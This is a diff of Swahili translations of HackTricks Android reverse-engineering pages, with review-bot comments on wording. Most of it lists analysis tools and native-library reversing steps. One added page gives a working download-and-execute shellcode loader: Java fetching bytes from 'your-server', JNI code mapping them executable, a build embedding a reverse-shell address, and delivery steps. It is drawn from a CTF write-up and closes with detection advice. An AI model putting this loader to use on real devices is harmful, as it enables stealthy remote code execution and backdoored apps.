StaCoAn ni zana ya **crossplatform** inayowasaidia developers, bugbounty hunters na ethical hackers kufanya [static code analysis](https://en.wikipedia.org/wiki/Static_program_analysis) kwenye mobile applications.
StaCoAn ni zana ya **crossplatform** inayosaidia waendelezaji, bugbounty hunters na ethical hackers kufanya [static code analysis](https://en.wikipedia.org/wiki/Static_program_analysis) kwenye programu za rununu.
Mfumo ni kwamba una-vuta na kuacha faili ya programu yako ya simu (faili ya .apk au .ipa) kwenye programu ya StaCoAn na itaunda ripoti ya kuona na rahisi kubeba kwako. Unaweza kubadilisha mipangilio na wordlists ili kupata uzoefu uliobinafsishwa.
Dhana ni kwamba unavuta na kuachilia faili ya programu yako ya rununu (faili ya .apk au .ipa) kwenye programu ya StaCoAn na itazalisha ripoti ya kuona na inayobebeka kwako. Unaweza kubadilisha mipangilio na wordlists ili kupata uzoefu uliobinafsishwa.
Download[ latest release](https://github.com/vincentcox/StaCoAn/releases):
```
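Review bot: the context line "Download[ latest release](https://github.com/vincentcox/StaCoAn/releases):" has the space inside the link brackets, so the link text starts with a space and "Download" runs into it; it should be "Download [latest release](...)". "Download" is also left untranslated where the surrounding paragraph is Swahili; the SUPER section uses "Pakua" for the same verb.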
@ -728,7 +732,7 @@ Download[ latest release](https://github.com/vincentcox/StaCoAn/releases):
```
### [AndroBugs](https://github.com/AndroBugs/AndroBugs_Framework)
AndroBugs Framework ni mfumo wa uchambuzi wa udhaifu wa Android unaosaidia waendelezaji au hackers kugundua udhaifu za usalama zinazoweza kuwepo katika programu za Android.\
AndroBugs Framework ni mfumo wa uchambuzi wa udhaifu wa Android unaosaidia waendelezaji au hackers kugundua udhaifu za kiusalama zinazowezekana katika programu za Android.\
[Windows releases](https://github.com/AndroBugs/AndroBugs_Framework/releases)
```
python androbugs.py -f [APK file]
@ -736,11 +740,11 @@ androbugs.exe -f [APK file]
```
### [Androwarn](https://github.com/maaaaz/androwarn)
**Androwarn** ni zana ambalo lengo lake kuu ni kugundua na kuwaonya mtumiaji kuhusu tabia hatari zinazoweza kutengenezwa na programu ya Android.
**Androwarn** ni zana ambayo lengo lake kuu ni kugundua na kuonya mtumiaji kuhusu tabia hatarishi zinazoweza kufanywa na programu ya Android.
Ugundaji hufanywa kwa kupitia **static analysis** ya bytecode ya programu ya Dalvik, inayowakilishwa kama **Smali**, kwa kutumia maktaba ya [`androguard`](https://github.com/androguard/androguard).
Utambuzi hufanywa kwa kutumia **static analysis** ya bytecode ya Dalvik ya programu, inayowakilishwa kama **Smali**, kwa kutumia maktaba ya [`androguard`](https://github.com/androguard/androguard).
Zana hii inaangalia **tabia za kawaida za programu "mbaya"** kama: Telephony identifiers exfiltration, Audio/video flow interception, PIM data modification, Arbitrary code execution...
Zana hii inatafuta **tabia za kawaida za programu "mbaya"** kama: Telephony identifiers exfiltration, Audio/video flow interception, PIM data modification, Arbitrary code execution...
```
python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3
```
@ -748,36 +752,36 @@ python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3
![](<../../images/image (595).png>)
**MARA** is a **M**obile **A**pplication **R**everse engineering and **A**nalysis Framework. Ni zana inayoweka pamoja zana zinazotumika mara kwa mara za mobile application reverse engineering na analysis, kusaidia katika kujaribu mobile applications dhidi ya OWASP mobile security threats. Lengo lake ni kufanya kazi hii iwe rahisi na rafiki kwa mobile application developers na security professionals.
**MARA** is a **M**obile **A**pplication **R**everse engineering and **A**nalysis Framework. Ni zana inayokusanya zana zinazotumika mara kwa mara za mobile application reverse engineering and analysis, kusaidia katika kujaribu programu za simu dhidi ya vitisho vya OWASP mobile security. Lengo lake ni kufanya kazi hii iwe rahisi na rafiki kwa watengenezaji wa programu za simu na wataalamu wa usalama.
It is able to:
Ina uwezo wa:
- Extract Java and Smali code using different tools
- Analyze APKs using: [smalisca](https://github.com/dorneanu/smalisca), [ClassyShark](https://github.com/google/android-classyshark), [androbugs](https://github.com/AndroBugs/AndroBugs_Framework), [androwarn](https://github.com/maaaaz/androwarn), [APKiD](https://github.com/rednaga/APKiD)
- Extract private information from the APK using regexps.
- Analyze the Manifest.
- Analyze found domains using: [pyssltest](https://github.com/moheshmohan/pyssltest), [testssl](https://github.com/drwetter/testssl.sh) and [whatweb](https://github.com/urbanadventurer/WhatWeb)
- Kutoa Java na Smali code kwa kutumia zana mbalimbali
- Fanya uchambuzi wa APKs kwa kutumia: [smalisca](https://github.com/dorneanu/smalisca), [ClassyShark](https://github.com/google/android-classyshark), [androbugs](https://github.com/AndroBugs/AndroBugs_Framework), [androwarn](https://github.com/maaaaz/androwarn), [APKiD](https://github.com/rednaga/APKiD)
- Kutoa taarifa za kibinafsi kutoka kwenye APK kwa kutumia regexps.
- Chunguza Manifest.
- Chunguza domains zilizopatikana kwa kutumia: [pyssltest](https://github.com/moheshmohan/pyssltest), [testssl](https://github.com/drwetter/testssl.sh) and [whatweb](https://github.com/urbanadventurer/WhatWeb)
- Deobfuscate APK via [apk-deguard.com](http://www.apk-deguard.com)
### Koodous
Inayofaa kutambua malware: [https://koodous.com/](https://koodous.com/)
Inafaa kugundua malware: [https://koodous.com/](https://koodous.com/)
## Obfuscating/Deobfuscating code
Kumbuka kwamba, kulingana na service na configuration unayotumia kuobfuscate the code, secrets zinaweza au zisiwe obfuscated.
Kumbuka kwamba, kulingana na huduma na usanidi unaotumika kuficha msimbo, siri zinaweza kuwa zimefichwa au siyo.
### [ProGuard](<https://en.wikipedia.org/wiki/ProGuard_(software)>)
From [Wikipedia](<https://en.wikipedia.org/wiki/ProGuard_(software)>): **ProGuard** is an open source command-line tool that shrinks, optimizes and obfuscates Java code. It is able to optimize bytecode as well as detect and remove unused instructions. ProGuard is free software and is distributed under the GNU General Public License, version 2.
Kutoka [Wikipedia](<https://en.wikipedia.org/wiki/ProGuard_(software)>): **ProGuard** ni zana ya open source ya command-line inayopunguza, kuboresha na kuficha Java code. Ina uwezo wa kuboresha bytecode pamoja na kugundua na kuondoa maelekezo yasiyotumika. ProGuard ni programu ya bure na imesambazwa chini ya GNU General Public License, version 2.
ProGuard is distributed as part of the Android SDK and runs when building the application in release mode.
ProGuard inasambazwa kama sehemu ya Android SDK na hufanya kazi wakati wa kujenga application katika release mode.
### [DexGuard](https://www.guardsquare.com/dexguard)
Find a step-by-step guide to deobfuscate the apk in [https://blog.lexfo.fr/dexguard.html](https://blog.lexfo.fr/dexguard.html)
Pata mwongozo hatua kwa hatua wa ku-deobfuscate apk katika [https://blog.lexfo.fr/dexguard.html](https://blog.lexfo.fr/dexguard.html)
(From that guide) Last time we checked, the Dexguard mode of operation was:
(Kulingana na mwongozo huo) Wakati wa mwisho tulipopima, mode ya utekelezaji ya Dexguard ilikuwa:
- load a resource as an InputStream;
- feed the result to a class inheriting from FilterInputStream to decrypt it;
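Review bot: "Wakati wa mwisho tulipopima" means "the last time we measured/tested"; the source is "Last time we checked", so "Mara ya mwisho tulipoangalia" is closer. The bullets that follow ("load a resource as an InputStream;", "feed the result to a class inheriting from FilterInputStream to decrypt it;") and the MARA bullet "Deobfuscate APK via apk-deguard.com" stay in English as unchanged context; if this pass is meant to finish translating the section they need the same treatment.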
@ -789,29 +793,29 @@ Find a step-by-step guide to deobfuscate the apk in [https://blog.lexfo.fr/dexgu
**DeGuard reverses the process of obfuscation performed by Android obfuscation tools. This enables numerous security analyses, including code inspection and predicting libraries.**
Unaweza upload an obfuscated APK kwenye platform yao.
Unaweza kupakia APK iliyofichwa kwenye jukwaa lao.
### [Deobfuscate android App]https://github.com/In3tinct/deobfuscate-android-app
Hii ni zana ya LLM kutafuta potential security vulnerabilities katika android apps na deobfuscate android app code. Inatumia Google's Gemini public API.
Hii ni zana ya LLM ya kugundua udhaifu wowote unaowezekana wa usalama katika android apps na ku-deobfuscate android app code. Inatumia Google's Gemini public API.
### [Simplify](https://github.com/CalebFenton/simplify)
It is a **generic android deobfuscator.** Simplify **virtually executes an app** to understand its behavior and then **tries to optimize the code** so it behaves identically but is easier for a human to understand. Each optimization type is simple and generic, so it doesn't matter what the specific type of obfuscation is used.
Ni generic android deobfuscator. Simplify virtually executes an app ili kuelewa tabia yake kisha inajaribu kuboresha code ili itendeke sawa lakini iwe rahisi kwa mwanadamu kuelewa. Kila aina ya uboreshaji ni rahisi na jumla, hivyo haijalishi ni aina gani mahsusi ya obfuscation ilitumika.
### [APKiD](https://github.com/rednaga/APKiD)
APKiD gives you information about **how an APK was made**. It identifies many **compilers**, **packers**, **obfuscators**, and other weird stuff. It's [_PEiD_](https://www.aldeid.com/wiki/PEiD) for Android.
APKiD inakupa taarifa kuhusu jinsi APK ilivyotengenezwa. Inatambua compilers, packers, obfuscators, na vitu vingine vya kushangaza. Ni [_PEiD_](https://www.aldeid.com/wiki/PEiD) kwa Android.
### Manual
[Read this tutorial to learn some tricks on **how to reverse custom obfuscation**](manual-deobfuscation.md)
[Soma mafunzo haya kujifunza mbinu za jinsi ya reverse custom obfuscation](manual-deobfuscation.md)
## Labs
### [Androl4b](https://github.com/sh4hin/Androl4b)
AndroL4b ni Android security virtual machine inayotegemea ubuntu-mate inayojumuisha mkusanyiko wa latest framework, tutorials na labs kutoka kwa security geeks na researchers kwa ajili ya reverse engineering na malware analysis.
AndroL4b ni virtual machine ya usalama wa Android inayotegemea ubuntu-mate inayojumuisha mkusanyiko wa mifumo ya hivi karibuni, mafunzo na maabara kutoka kwa wapenzi mbalimbali wa usalama na watafiti kwa reverse engineering na malware analysis.
## References
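Review bot: the Swahili replacements for the Simplify, APKiD and Manual paragraphs drop the bold markup that the English lines they replace carry (`**generic android deobfuscator**`, `**how an APK was made**`, `**compilers**`, `**packers**`, `**how to reverse custom obfuscation**`); keep the `**...**` so these sections carry the same emphasis as the rest of the translated page. While this region is being touched, the unchanged heading `### [Deobfuscate android App]https://github.com/In3tinct/deobfuscate-android-app` is a malformed link (the URL is missing its parentheses) and should read `### [Deobfuscate android App](https://github.com/In3tinct/deobfuscate-android-app)`.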
@ -820,15 +824,11 @@ AndroL4b ni Android security virtual machine inayotegemea ubuntu-mate inayojumui
- [https://maddiestone.github.io/AndroidAppRE/](https://maddiestone.github.io/AndroidAppRE/) Android quick course
- [https://manifestsecurity.com/android-application-security/](https://manifestsecurity.com/android-application-security/)
- [https://github.com/Ralireza/Android-Security-Teryaagh](https://github.com/Ralireza/Android-Security-Teryaagh)
- [https://www.youtube.com/watch?v=PMKnPaGWxtg\&feature=youtu.be\&ab_channel=B3nacSec](https://www.youtube.com/watch?v=PMKnPaGWxtg&feature=youtu.be&ab_channel=B3nacSec)
- [https://www.youtube.com/watch?v=PMKnPaGWxtg&feature=youtu.be&ab_channel=B3nacSec](https://www.youtube.com/watch?v=PMKnPaGWxtg&feature=youtu.be&ab_channel=B3nacSec)
- [SSLPinDetect: Advanced SSL Pinning Detection for Android Security Analysis](https://petruknisme.medium.com/sslpindetect-advanced-ssl-pinning-detection-for-android-security-analysis-1390e9eca097)
- [SSLPinDetect GitHub](https://github.com/aancw/SSLPinDetect)
- [smali-sslpin-patterns](https://github.com/aancw/smali-sslpin-patterns)
- [Build a Repeatable Android Bug Bounty Lab: Emulator vs Magisk, Burp, Frida, and Medusa](https://www.yeswehack.com/learn-bug-bounty/android-lab-mobile-hacking-tools)
## Yet to try
- [https://www.vegabird.com/yaazhini/](https://www.vegabird.com/yaazhini/)
- [https://github.com/abhi-r3v0/Adhrit](https://github.com/abhi-r3v0/Adhrit)
- [CoRPhone — Android in-memory JNI execution and packaging pipeline](https://github.com/0xdevil/corphone)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -0,0 +1,121 @@
# Android Utekelezaji wa Msimbo wa Native Kwenye Kumbukumbu kupitia JNI (shellcode)
{{#include ../../banners/hacktricks-training.md}}
Ukurasa huu unaandika mfumo wa vitendo wa kutekeleza native payloads kikamilifu kwenye kumbukumbu kutoka kwa mchakato wa app ya Android isiyoaminika kwa kutumia JNI. Mtiririko unazuia kuunda binary yoyote ya native kwenye diski: download raw shellcode bytes over HTTP(S), ipite kwa JNI bridge, allocate RX memory, na ruka ndani yake.
Kwa nini ni muhimu
- Inapunguza artefakti za forensi (hakuna ELF kwenye diski)
- Inafaa kwa “stage-2” native payloads zilizotengenezwa kutoka binary ya exploit ya ELF
- Inalingana na tradecraft inayotumiwa na malware ya kisasa na red teams
Mfumo wa juu
1) Pakua shellcode bytes katika Java/Kotlin
2) Call a native method (JNI) with the byte array
3) Katika JNI: allocate RW memory → copy bytes → mprotect to RX → call entrypoint
Mfano minimal
Java/Kotlin side
```java
public final class NativeExec {
static { System.loadLibrary("nativeexec"); }
public static native int run(byte[] sc);
}
// Download and execute (simplified)
byte[] sc = new java.net.URL("https://your-server/sc").openStream().readAllBytes();
int rc = NativeExec.run(sc);
```
Upande la C JNI (arm64/amd64)
```c
#include <jni.h>
#include <sys/mman.h>
#include <string.h>
#include <unistd.h>
static inline void flush_icache(void *p, size_t len) {
__builtin___clear_cache((char*)p, (char*)p + len);
}
JNIEXPORT jint JNICALL
Java_com_example_NativeExec_run(JNIEnv *env, jclass cls, jbyteArray sc) {
jsize len = (*env)->GetArrayLength(env, sc);
if (len <= 0) return -1;
// RW anonymous buffer
void *buf = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (buf == MAP_FAILED) return -2;
jboolean isCopy = 0;
jbyte *bytes = (*env)->GetByteArrayElements(env, sc, &isCopy);
if (!bytes) { munmap(buf, len); return -3; }
memcpy(buf, bytes, len);
(*env)->ReleaseByteArrayElements(env, sc, bytes, JNI_ABORT);
// Make RX and execute
if (mprotect(buf, len, PROT_READ | PROT_EXEC) != 0) { munmap(buf, len); return -4; }
flush_icache(buf, len);
int (*entry)(void) = (int (*)(void))buf;
int ret = entry();
// Optional: restore RW and wipe
mprotect(buf, len, PROT_READ | PROT_WRITE);
memset(buf, 0, len);
munmap(buf, len);
return ret;
}
```
Vidokezo na tahadhari
- W^X/execmem: Android ya kisasa inatekeleza W^X; anonymous PROT_EXEC mappings bado kwa ujumla zinaruhusiwa kwa app processes yenye JIT (subject to SELinux policy). Vifaa/ROMs vingine vinaweka vizuizi; rudi kutumia JIT-allocated exec pools au native bridges inapohitajika.
- Architectures: Hakikisha shellcode architecture inaendana na kifaa (arm64-v8a commonly; x86 only on emulators).
- Entrypoint contract: Amua convention kwa entry ya shellcode yako (no args vs structure pointer). Iweka position-independent (PIC).
- Stability: Clear instruction cache kabla ya kuruka; mismatched cache inaweza kusababisha crash kwenye ARM.
Packaging ELF → positionindependent shellcode
A robust operator pipeline is to:
- Build your exploit as a static ELF with musl-gcc
- Convert the ELF into a selfloading shellcode blob using pwntools shellcraft.loader_append
Build
```bash
musl-gcc -O3 -s -static -fno-pic -o exploit exploit.c \
-DREV_SHELL_IP="\"10.10.14.2\"" -DREV_SHELL_PORT="\"4444\""
```
Geuza ELF kuwa shellcode ghafi (mfano amd64)
```python
# exp2sc.py
from pwn import *
context.clear(arch='amd64')
elf = ELF('./exploit')
loader = shellcraft.loader_append(elf.data, arch='amd64')
sc = asm(loader)
open('sc','wb').write(sc)
print(f"ELF size={len(elf.data)}, shellcode size={len(sc)}")
```
Kwa nini loader_append inafanya kazi: hutoa loader ndogo inayopanga segments za programu za ELF zilizowekwa ndani ya memory na kuhamisha udhibiti kwa entrypoint yake, ikikupa raw blob moja inayoweza ku-memcpy na kutekelezwa na app.
Delivery
- Host sc on an HTTP(S) server you control
- The backdoored/test app downloads sc and invokes the JNI bridge shown above
- Listen on your operator box for any reverse connection the kernel/user-mode payload establishes
Validation workflow for kernel payloads
- Tumia simbolized vmlinux kwa reversing ya haraka/urejeshaji wa offsets
- Prototype primitives on a convenient debug image if available, but always re-validate on the actual Android target (kallsyms, KASLR slide, page-table layout, and mitigations differ)
Hardening/Detection (blue team)
- Zuia anonymous PROT_EXEC katika app domains pale inapowezekana (SELinux policy)
- Lazimishe strict code integrity (hakuna dynamic native loading kutoka network) na thibitisha update channels
- Monitor mmap/mprotect transitions zisizo za kawaida kwenda RX na kunakili kwa wingi kwa byte-array kabla ya jumps
References
- [CoRPhone challenge repo (Android kernel pwn; JNI memory-only loader pattern)](https://github.com/0xdevil/corphone)
- [build.sh (musl-gcc + pwntools pipeline)](https://raw.githubusercontent.com/0xdevil/corphone/main/exploit/build.sh)
- [exp2sc.py (pwntools shellcraft.loader_append)](https://raw.githubusercontent.com/0xdevil/corphone/main/exploit/exp2sc.py)
- [exploit.c TL;DR (operator/kernel flow, offsets, reverse shell)](https://raw.githubusercontent.com/0xdevil/corphone/main/exploit/exploit.c)
- [INSTRUCTIONS.md (setup notes)](https://github.com/0xdevil/corphone/blob/main/INSTRUCTIONS.md)
{{#include ../../banners/hacktricks-training.md}}
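Review bot: the translation of this new page is only partial. The opening paragraph switches language mid-sentence ("download raw shellcode bytes over HTTP(S), ipite kwa JNI bridge, allocate RX memory, na ruka ndani yake"), step 2 of the high-level flow ("Call a native method (JNI) with the byte array") stays in English between two translated steps, and the "Packaging ELF", "Delivery" and "Validation workflow for kernel payloads" blocks are entirely English while their neighbours are Swahili; either finish the translation or keep whole blocks in one language. Several hyphens were lost when the text was pasted ("positionindependent", "selfloading"); restore "position-independent" and "self-loading". In the "Hardening/Detection (blue team)" list, the first bullet could spell out the control that the "W^X/execmem" note above already names: the SELinux `execmem` permission for app domains is exactly what the anonymous `PROT_EXEC` mapping in the C snippet (the `mmap` then `mprotect` to RX path) depends on, so denying or auditing it in the app domains is the concrete form of "Zuia anonymous PROT_EXEC", and it is the same transition the "Monitor mmap/mprotect transitions" bullet asks to watch.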

View File

@ -1,16 +1,16 @@
# Kuchambua Maktaba za Asili
# Uchambuzi wa Maktaba za Native
{{#include ../../banners/hacktricks-training.md}}
**Kwa taarifa zaidi angalia:** [**https://maddiestone.github.io/AndroidAppRE/reversing_native_libs.html**](https://maddiestone.github.io/AndroidAppRE/reversing_native_libs.html)
**Kwa taarifa za ziada angalia:** [**https://maddiestone.github.io/AndroidAppRE/reversing_native_libs.html**](https://maddiestone.github.io/AndroidAppRE/reversing_native_libs.html)
Programu za Android zinaweza kutumia maktaba za asili, mara nyingi zilizotungwa kwa C au C++, kwa kazi zinazohitaji utendaji wa juu. Waumba wa malware pia hutumia maktaba hizi kwa sababu ELF shared objects bado ni ngumu zaidi decompile ikilinganishwa na DEX/OAT byte-code.
Ukurasa huu unalenga kwenye mtiririko wa kazi wa *vitendo* na maboresho ya zana *ya hivi karibuni* (2023-2025) ambayo yanafanya kuchambua faili za Android `.so` kuwa rahisi zaidi.
Apps za Android zinaweza kutumia maktaba za native, kwa kawaida zilizoandikwa kwa C au C++, kwa kazi zinazohitaji utendakazi mkubwa. Waandishi wa malware pia hutumia maktaba hizi kwa sababu ELF shared objects bado ni ngumu zaidi ku-decompile kuliko DEX/OAT byte-code.
Ukurasa huu unalenga mitiririko ya kazi ya *vitendo* na maboresho ya zana za *karibuni* (2023-2025) yanayofanya kureverse mafaili ya `.so` ya Android kuwa rahisi.
---
### Mtiririko wa uchunguzi wa haraka kwa `libfoo.so` iliyotolewa hivi karibuni
### Mbinu ya uchunguzi wa haraka kwa `libfoo.so` iliyopigwa hivi punde
1. **Toa maktaba**
```bash
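Review bot: in the new heading "### Mbinu ya uchunguzi wa haraka kwa `libfoo.so` iliyopigwa hivi punde", "iliyopigwa" reads as "beaten/struck", which is not the intended sense (a library just pulled from the device, as step 1 "Toa maktaba" makes clear); the wording it replaces, "iliyotolewa", carried that meaning correctly, so keep it, for example "`libfoo.so` iliyotolewa hivi punde".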
@ -25,26 +25,26 @@ file libfoo.so # arm64 or arm32 / x86
readelf -h libfoo.so # OS ABI, PIE, NX, RELRO, etc.
checksec --file libfoo.so # (peda/pwntools)
```
3. **Orodhesha alama zilizotumwa nje & vifungo vya JNI**
3. **Orodhesha exported symbols & JNI bindings**
```bash
readelf -s libfoo.so | grep ' Java_' # dynamic-linked JNI
strings libfoo.so | grep -i "RegisterNatives" -n # static-registered JNI
```
4. **Pakia katika decompiler** (Ghidra ≥ 11.0, IDA Pro, Binary Ninja, Hopper or Cutter/Rizin) na endesha uchambuzi otomatiki.
Toleo jipya la Ghidra limeleta decompiler ya AArch64 inayotambua PAC/BTI stubs na MTE tags, ikiboresha sana uchambuzi wa maktaba zilizojengwa kwa NDK ya Android 14.
4. **Pakia katika decompiler** (Ghidra ≥ 11.0, IDA Pro, Binary Ninja, Hopper or Cutter/Rizin) na endesha auto-analysis.
Toleo jipya la Ghidra liliingiza decompiler ya AArch64 inayotambua PAC/BTI stubs na MTE tags, ikiboresha sana uchambuzi wa maktaba zilizojengwa kwa Android 14 NDK.
5. **Amua kati ya static vs dynamic reversing:** code iliyokatwa au iliyofichwa mara nyingi inahitaji *instrumentation* (Frida, ptrace/gdbserver, LLDB).
---
### Instrumentation ya Dynamic (Frida ≥ 16)
### Dynamic Instrumentation (Frida ≥ 16)
Mfululizo wa Frida 16 ulileta maboresho kadhaa maalumu kwa Android ambayo husaidia pale lengo linapotumia optimizations za kisasa za Clang/LLD:
Fridas 16-series ilileta maboresho kadhaa maalumu kwa Android yanayosaidia wakati lengo linapotumia optimisations za kisasa za Clang/LLD:
* `thumb-relocator` sasa inaweza *hook* tiny ARM/Thumb functions zinazozalishwa na alignment kali ya LLD (`--icf=all`).
* Kukagua na kure-bind *ELF import slots* kunafanya kazi kwenye Android, kuruhusu patching kwa kila module kwa `dlopen()`/`dlsym()` wakati inline hooks zinapokataa.
* Java hooking ilirekebishwa kwa **ART quick-entrypoint** mpya inayotumika wakati apps zime-compile kwa `--enable-optimizations` kwenye Android 14.
* `thumb-relocator` sasa inaweza *ku-hook functions ndogo za ARM/Thumb* zilizotengenezwa na alignment kali ya LLD (`--icf=all`).
* Kuorodhesha na kurebind ELF import slots kunafanya kazi kwenye Android, kuwezesha patching per-module ya `dlopen()`/`dlsym()` wakati inline hooks zinakubaliwa.
* Java hooking ilirekebishwa kwa ART quick-entrypoint mpya inayotumika wakati apps zinapojengwa na `--enable-optimizations` kwenye Android 14.
Mfano: kuorodhesha functions zote zilizosasishwa kupitia `RegisterNatives` na ku-dump anwani zao wakati wa runtime:
Mfano: kuorodhesha functions zote zilizosajiliwa kupitia `RegisterNatives` na kutupa anwani zao wakati wa runtime:
```javascript
Java.perform(function () {
var Runtime = Java.use('java.lang.Runtime');
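Review bot: the bullet "Kuorodhesha na kurebind ELF import slots ... wakati inline hooks zinakubaliwa" inverts the meaning of the line it replaces ("wakati inline hooks zinapokataa"): patching the `dlopen()`/`dlsym()` import slots is the fallback for when inline hooks are rejected, not accepted, so "zinakubaliwa" should be "zinapokataliwa" (or the previous wording kept). Also "Fridas 16-series" lost its apostrophe ("Frida's"), and in the example lead-in "kutupa anwani" reads as "throw away addresses"; the earlier "ku-dump anwani" was clearer.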
@ -61,29 +61,29 @@ console.log('[+] RegisterNatives on ' + clazz.getName() + ' -> ' + count + ' met
});
});
```
Frida itafanya kazi bila marekebisho kwenye vifaa vya PAC/BTI (Pixel 8/Android 14+) mradi tu utumie frida-server 16.2 au toleo jipya zaidi — matoleo ya awali yalishindwa kutambua padding kwa inline hooks.
Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+) as long as you use frida-server 16.2 or later earlier versions failed to locate padding for inline hooks.
### Telemetry ya ndani ya mchakato ya JNI kupitia .so iliyopangwa kabla (SoTap)
### Process-local JNI telemetry via preloaded .so (SoTap)
Wakati instrumentation yenye sifa kamili ni zaidi ya kinachohitajika au imezuiliwa, bado unaweza kupata uonekano wa kiwango cha native kwa kupakia kabla logger ndogo ndani ya mchakato lengwa. SoTap ni maktaba nyepesi ya Android native (.so) inayorekodi tabia ya wakati wa utekelezaji ya maktaba nyingine za JNI (.so) ndani ya mchakato huo wa app (no root required).
Wakati instrumentation yenye vipengele kamili ni kupita kiasi au imezuiwa, bado unaweza kupata uonekano wa ngazi ya native kwa ku-preload logger ndogo ndani ya mchakato lengwa. SoTap ni maktaba nyepesi ya Android native (.so) inayorekodi tabia ya wakati wa utekelezaji ya maktaba nyingine za JNI (.so) ndani ya mchakato moja la app (hakuna root inahitajika).
Sifa muhimu:
- Inaanza mapema na inafuatilia mwingiliano wa JNI/native ndani ya mchakato unaoipakia.
- Inahifadhi logs kwa kutumia njia mbalimbali zinazoweza kuandikwa na ina fallback ya heshima kwa Logcat wakati uhifadhi umezuiliwa.
- Inayoweza kubadilishwa kwenye chanzo: hariri sotap.c ili kupanua/kubadilisha kinachorekodiwa na ujenge upya kwa kila ABI.
Key properties:
- Inaanzishwa mapema na inachunguza mwingiliano wa JNI/native ndani ya mchakato unaoiweka.
- Inaendelea kuhifadhi logs ikitumia njia mbalimbali zinazoweza kuandikwa na kwa upendeleo inarudi kwa Logcat wakati uhifadhi umezuiliwa.
- Inayoweza kubadilishwa chanzo: hariri sotap.c ili kupanua/rekebisha kinachorekodiwa na ujenge upya kwa kila ABI.
Usanidi (repack the APK):
1) Weka build sahihi ya ABI ndani ya APK ili loader iweze kutatua libsotap.so:
Setup (repack the APK):
1) Drop the proper ABI build into the APK so the loader can resolve libsotap.so:
- lib/arm64-v8a/libsotap.so (for arm64)
- lib/armeabi-v7a/libsotap.so (for arm32)
2) Hakikisha SoTap inapakuliwa kabla ya maktaba nyingine za JNI. Inject a call early (e.g., Application subclass static initializer or onCreate) ili logger ianzishwe kwanza. Smali snippet example:
2) Ensure SoTap loads before other JNI libs. Inject a call early (e.g., Application subclass static initializer or onCreate) so the logger is initialized first. Smali snippet example:
```smali
const-string v0, "sotap"
invoke-static {v0}, Ljava/lang/System;->loadLibrary(Ljava/lang/String;)V
```
3) Rebuild/sign/install, run the app, then collect logs.
Njia za logi (zinakaguliwa kwa mpangilio):
Log paths (checked in order):
```
/data/user/0/%s/files/sotap.log
/data/data/%s/files/sotap.log
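Review bot: this hunk moves in the wrong direction for a translation commit: the Swahili sentence "Frida itafanya kazi bila marekebisho..." and the heading "Telemetry ya ndani ya mchakato ya JNI kupitia .so iliyopangwa kabla (SoTap)" are replaced by English ("Frida will work out of the box...", "Process-local JNI telemetry via preloaded .so (SoTap)"), as are "Sifa muhimu:" (now "Key properties:"), "Usanidi (repack the APK):" (now "Setup (repack the APK):"), step 2 of the setup and "Njia za logi" (now "Log paths"); restore the translated lines unless the English is intended. In the added English sentence a dash is missing between "later" and "earlier" ("frida-server 16.2 or later earlier versions failed to locate padding"). In "ndani ya mchakato moja la app" the noun agreement should be "mchakato mmoja wa app".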
@ -100,37 +100,48 @@ This approach is useful for malware triage and JNI debugging where observing nat
---
### See also: inmemory native code execution via JNI
A common attack pattern is to download a raw shellcode blob at runtime and execute it directly from memory through a JNI bridge (no ondisk ELF). Details and readytouse JNI snippet here:
{{#ref}}
in-memory-jni-shellcode-execution.md
{{#endref}}
---
### Recent vulnerabilities worth hunting for in APKs
| Year | CVE | Affected library | Notes |
| Mwaka | CVE | Maktaba iliyoathirika | Maelezo |
|------|-----|------------------|-------|
|2023|CVE-2023-4863|`libwebp` ≤ 1.3.1|Heap buffer overflow reachable from native code that decodes WebP images. Several Android apps bundle vulnerable versions. When you see a `libwebp.so` inside an APK, check its version and attempt exploitation or patching.| |
|2024|Multiple|OpenSSL 3.x series|Several memory-safety and padding-oracle issues. Many Flutter & ReactNative bundles ship their own `libcrypto.so`.|
Unapogundua *third-party* `.so` files ndani ya APK, hakikisha unalinganisha hash yao dhidi ya advisories za upstream. SCA (Software Composition Analysis) haiko kawaida kwenye mobile, kwa hivyo builds zilizozee zenye udhaifu ni nyingi.
When you spot *third-party* `.so` files inside an APK, always cross-check their hash against upstream advisories. SCA (Software Composition Analysis) is uncommon on mobile, so outdated vulnerable builds are rampant.
---
### Anti-Reversing & Hardening trends (Android 13-15)
* **Pointer Authentication (PAC) & Branch Target Identification (BTI):** Android 14 inawezesha PAC/BTI katika system libraries kwenye silicon inayounga mkono ARMv8.3+. Decompilers sasa zinaonyesha PACrelated pseudo-instructions; kwa dynamic analysis Frida inaingiza trampolines *after* stripping PAC, lakini trampolines zako za kawaida zinapaswa kuita `pacda`/`autibsp` inapofaa.
* **MTE & Scudo hardened allocator:** memory-tagging ni opt-in lakini apps nyingi zinazotumia Play-Integrity zinajenga kwa `-fsanitize=memtag`; tumia `setprop arm64.memtag.dump 1` pamoja na `adb shell am start ...` ili kushika tag faults.
* **LLVM Obfuscator (opaque predicates, control-flow flattening):** commercial packers (e.g., Bangcle, SecNeo) zinazilinda zaidi *native* code, si Java pekee; tarajia bogus control-flow na encrypted string blobs katika `.rodata`.
* **Pointer Authentication (PAC) & Branch Target Identification (BTI):** Android 14 enables PAC/BTI in system libraries on supported ARMv8.3+ silicon. Decompilers now display PACrelated pseudo-instructions; for dynamic analysis Frida injects trampolines *after* stripping PAC, but your custom trampolines should call `pacda`/`autibsp` where necessary.
* **MTE & Scudo hardened allocator:** memory-tagging is opt-in but many Play-Integrity aware apps build with `-fsanitize=memtag`; use `setprop arm64.memtag.dump 1` plus `adb shell am start ...` to capture tag faults.
* **LLVM Obfuscator (opaque predicates, control-flow flattening):** commercial packers (e.g., Bangcle, SecNeo) increasingly protect *native* code, not only Java; expect bogus control-flow and encrypted string blobs in `.rodata`.
---
### Resources
### Rasilimali
- **Learning ARM Assembly:** [Azeria Labs ARM Assembly Basics](https://azeria-labs.com/writing-arm-assembly-part-1/)
- **JNI & NDK Documentation:** [Oracle JNI Spec](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html) · [Android JNI Tips](https://developer.android.com/training/articles/perf-jni) · [NDK Guides](https://developer.android.com/ndk/guides/)
